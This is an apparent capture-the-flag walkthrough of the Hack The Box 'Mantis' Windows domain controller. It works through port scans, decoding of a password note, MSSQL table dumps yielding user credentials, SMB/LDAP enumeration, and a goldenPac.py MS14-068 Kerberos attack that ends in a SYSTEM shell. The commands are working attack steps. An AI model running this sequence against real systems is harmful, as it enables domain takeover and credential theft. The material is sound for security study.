#################
One of the more challenging machines 
Knowledge or research of Windows Servers and the domain controller system is required.
Base64 Decrypt + MSQL Server
Dump SQL Tables + User Creds 
Kerberos MS14–068 - goldenPac.py attack 
#################

1-Enumeration:
    nmap -T5 -sV -sC -Pn 10.10.10.52  -oN enum/scan.log -vv
    PORT      STATE    SERVICE        REASON      VERSION
    53/tcp    open     domain         syn-ack     Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
    | dns-nsid: 
    |_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
    88/tcp    open     kerberos-sec   syn-ack     Microsoft Windows Kerberos (server time: 2024-03-13 22:24:27Z)
    135/tcp   open     msrpc          syn-ack     Microsoft Windows RPC
    139/tcp   open     netbios-ssn    syn-ack     Microsoft Windows netbios-ssn
    389/tcp   open     ldap           syn-ack     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
    445/tcp   open     microsoft-ds   syn-ack     Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
    464/tcp   open     kpasswd5?      syn-ack
    593/tcp   open     ncacn_http     syn-ack     Microsoft Windows RPC over HTTP 1.0
    636/tcp   open     tcpwrapped     syn-ack
    705/tcp   filtered agentx         no-response
    1433/tcp  open     ms-sql-s       syn-ack     Microsoft SQL Server 2014 12.00.2000.00; RTM
    ....
    | ms-sql-info: 
    |   10.10.10.52:1433: <-------------------------------- 1433
    |     Version: 
    |       name: Microsoft SQL Server 2014 RTM
    |       number: 12.00.2000.00
    |       Product: Microsoft SQL Server 2014
    |       Service pack level: RTM
    |       Post-SP patches applied: false
    |_    TCP port: 1433
    | ms-sql-ntlm-info: 
    |   10.10.10.52:1433: 
    |     Target_Name: HTB
    |     NetBIOS_Domain_Name: HTB
    |     NetBIOS_Computer_Name: MANTIS
    |     DNS_Domain_Name: htb.local
    |     DNS_Computer_Name: mantis.htb.local
    |     DNS_Tree_Name: htb.local
    |_    Product_Version: 6.1.7601
    
.    8080/tcp  open     http           syn-ack     Microsoft IIS httpd 7.5
    |_http-title: Tossed Salad - Blog
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Microsoft-IIS/7.5

    Host script results:
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: required
    | smb2-security-mode: 
    |   2:1:0: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2024-03-13T22:25:23
    |_  start_date: 2024-03-13T22:22:37
    | smb-os-discovery: 
    |   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
    |   Computer name: mantis
    |   NetBIOS computer name: MANTIS\x00
    |   Domain name: htb.local
    |   Forest name: htb.local
    |   FQDN: mantis.htb.local
    |_  System time: 2024-03-13T18:25:26-04:00
    | p2p-conficker: 
    |_  0/4 checks are positive: Host is CLEAN or ports are blocked
    |_clock-skew: mean: 48m00s, deviation: 1h47m22s, median: -1s


    RPC + LDAP == Nothing for the moment

    SMB:
        └─$ crackmapexec smb 10.10.10.52 -u "" -p '' --shares 
        SMB         10.10.10.52     445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
        SMB         10.10.10.52     445    MANTIS           [+] htb.local\: 


    Port 8080:
        gobuster dir -u http://mantis.htb.local:8080// -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt | tee enum/gobuster-p80 log
        /archive
        /admin 


    Port 1337:
        nmap -T4 -sC -sV -Pn -p- 10.10.10.52 -v
            1337/tcp  open  http         Microsoft IIS httpd 7.5  <---- SQL server accessible via HTTP
            |_http-title: IIS7
            | http-methods: 
            |   Supported Methods: OPTIONS TRACE GET HEAD POST
            |_  Potentially risky methods: TRACE
            |_http-server-header: Microsoft-IIS/7.5


        ─$ gobuster dir -u http://mantis.htb.local:1337// -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt | tee enum/gobuster-p1337 log
            /orchard 
            /secure_notes

        We found some hashes in the note.txt:
            echo -n NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx |base64 -d
            echo -n 6d2424716c5f53405f504073735730726421 | wc -c 
            echo -n 6d2424716c5f53405f504073735730726421 | xxd -ps -r 

            m$$ql_S@_P@ssW0rd!

        We use Impacket mssqlclient to connect to the SQL server:
            /usr/share/doc/python3-impacket/examples/mssqlclient.py admin@10.10.10.52

        Showing master db:
            SQL (admin  admin@master)> SELECT name FROM master.sys.databases
            SQL (admin  admin@master)> use orcharddb <--- Name of the CMS for the website could containe juicy things

            SQL (admin  admin@orcharddb)> SELECT TABLE_NAME FROM information_schema.tables <--- Show tables

                We found this table: "blog_Orchard_Users_UserPartRecord"  

            SQL > SELECT * FROM information_schema.tables where TABLE_NAME='blog_Orchard_Users_UserPartRecord'
            SQL > SELECT USERNAME, EMAIL, PASSWORD from blog_Orchard_Users_UserPartRecord

            We found James creds 

    SMB Enum again with James Creds:
        ─$ crackmapexec smb 10.10.10.52 -u "james" -p 'J@m3s_P@ssW0rd!' --shares
            SMB         10.10.10.52     445    MANTIS           NETLOGON        READ            Logon server share 
            SMB         10.10.10.52     445    MANTIS           SYSVOL          READ            Logon server share 

    LDAP Enum again:
        ─$ enum4linux -a -u "james" -p 'J@m3s_P@ssW0rd!' 10.10.10.52 
            [+]  Getting builtin group memberships:                                                                                                                                                                                                                                                                                                                                                                                                                            
            Group: Remote Desktop Users' (RID: 555) has member: HTB\james   <----james is able to rdp

    On Both side no credsssss


2-Exploit:
    We can exploit Kerberos MS14–068 with this, cause it seems PAC is enabled. The Privileged Attribute Certificate (PAC) is an extension to Kerberos tickets that contains useful information about a user’s privileges. 
    This information is added to Kerberos tickets by a domain controller when a user authenticates within an Active Directory domain
        -https://labs.f-secure.com/archive/digging-into-ms14-068-exploitation-and-defence/

    We will use Goldenpac.py from impacket:
        The Golden PAC module included in Impacket makes post exploitation easier by performing it automatically for you. 
        Once a TGT containing a forged PAC has been created it is used to create an SMB connection to the domain controller and the PsExec technique is used to gain command execution

        └─$ /usr/share/doc/python3-impacket/examples/goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 HTB.local/james@mantis.htb.local
            C:\Windows\system32>whoami
            nt authority\system






            
